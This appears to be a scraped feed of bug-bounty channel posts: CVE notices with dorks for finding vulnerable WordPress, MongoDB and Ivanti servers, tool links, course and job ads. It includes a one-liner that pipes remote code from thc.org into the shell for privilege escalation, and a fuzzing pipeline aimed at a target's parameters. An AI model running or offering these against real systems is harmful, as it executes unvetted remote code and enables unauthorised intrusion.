Ultimate Secret Scanner Regex Collection
30+ regex patterns to detect leaked credentials:
- API keys (Google, AWS, Stripe)
- Auth tokens (OAuth, JWT)
- Private keys (RSA, PGP)
- Emails, URLs, UUIDs
https://github.com/Lu3ky13/Search-for-all-leaked-keys-secrets-using-one-regex-/tree/main
#bugbounty #bugbountytip
Google Dorks that can be used for penetration testing, security research, and information gathering.
https://github.com/yogsec/Pen-Testing-Google-Dorks
Web Pentesting & Bug Bounty Batch - Starting April!
Master Web Penetration Testing with a Bug Bounty Approach in our new batch starting this April! Learn real-world attack scenarios, exploitation techniques, and defense strategies.
- Weekday & Weekend Batches - Evening Slots (IST)
- Hands-on Labs & Live Automations
- Bug Bounty Methodologies & Practical Hunting
- Community Support & Private POC Access
Limited slots! Enroll now and take your hacking skills to the next level.
DM https://wa.link/brutsecurity for details! (https://wa.me/+918945971332)
On this special occasion, we extend our warmest wishes to all who celebrate Eid. May this day bring you joy, peace, and prosperity.
At Brut Security, we value diversity and unity, and we appreciate each and every member of our community. Whether you're celebrating or simply sharing in the happiness of others, we hope today is filled with kindness and togetherness.
Stay curious, stay secure, and keep learning!
CVE-2025-2294: Path Traversal in Kubio WordPress plugin, 9.8 rating
A vulnerability found in a popular plugin allows unauthenticated attackers to execute any code in PHP files on the server.
Search at Netlas.io:
Link: https://nt.ls/iOqr6
Dork: http.body:"plugins/kubio"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kubio/kubio-ai-page-builder-251-unauthenticated-local-file-inclusion
CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):
". <(curl -SsfL https://thc.org/7350pipe)"
Discover Web Vulns Like a Pro!
Want to hunt XSS, SQLi, LFI, and SSRF on any site? Here's a killer one-liner I've been using:
gau target.com | gf xss,lfi,sqli,ssrf | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/lfi.txt,payloads/sqli.txt,payloads/ssrf.txt -fr "FUZZ" | tee param_vulns.txt
What's it do?
1. Grabs URLs: gau digs up every URL for target.com from the web's archives.
2. Finds Weak Spots: gf filters for params ripe for hacking (XSS, SQLi, etc.).
3. Sets the Trap: qsreplace swaps values with FUZZ for testing.
4. Fuzzes Hard: ffuf blasts payloads from my custom lists - XSS popups, file leaks, you name it!
5. Saves the Loot: Results land in param_vulns.txt for you to exploit.
Pro Tip: Add -t 50 to ffuf for speed, or -fc 404 to skip dead ends. Test responsibly!
Curious about hacking tricks like this? Join my crew at https://discord.gg/u7uMFV833h for more tools, tips, and chaos. Dr
CVE-2025-3083, -3084, -3085: Vulnerabilities in MongoDB, 6.5 - 8.1 rating
Vulnerabilities in some versions of MongoDB allow attackers to perform DoS and gain unauthorized access using revoked certificates.
Search at Netlas.io:
Link: https://nt.ls/aqCrV
Dork: mongodb.build_info.version:[6.0.0 TO 6.0.20] OR mongodb.build_info.version:[5.0.0 TO 5.0.31] OR mongodb.build_info.version:[7.0.0 TO 7.0.16]
Vendor's advisory: https://jira.mongodb.org/browse/SERVER-95445
Freelance Security Analyst for CTF Challenge
Job Type: Freelance | Remote | Short-term
We need an experienced cybersecurity professional to assist with a CTF challenge. Must be skilled in:
- Web Exploitation, Reverse Engineering, Cryptography, Forensics, OSINT
- CTF platforms (Hack The Box, TryHackMe, PicoCTF, etc.)
- Tools like Burp Suite, Wireshark, Ghidra, IDA Pro, Metasploit
- Ethical hacking & exploit development (OSCP, CEH preferred)
Send your resume to [email protected] or WhatsApp +91-8016167754.
Let's solve this challenge together!
Use TLSx to detect certificate misconfigurations
Use this command to check for expired, self-signed, mismatched, revoked AND untrusted certificates
A simple Python script to scan multiple targets for SQL Injection via HTTP headers like User-Agent, X-Forwarded-For, and X-Client-IP.
https://github.com/ifconfig-me/SQLi-Scanner
CVE-2025-22457: RCE in Ivanti Connect Secure, 9.0 rating
A buffer overflow in Ivanti Connect Secure allows an unauthenticated attacker to perform remote code execution.
Search at Netlas.io:
Link: https://nt.ls/zsWig
Dork: http.body:"welcome.cgi?p=logo"
Vendor's advisory: https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US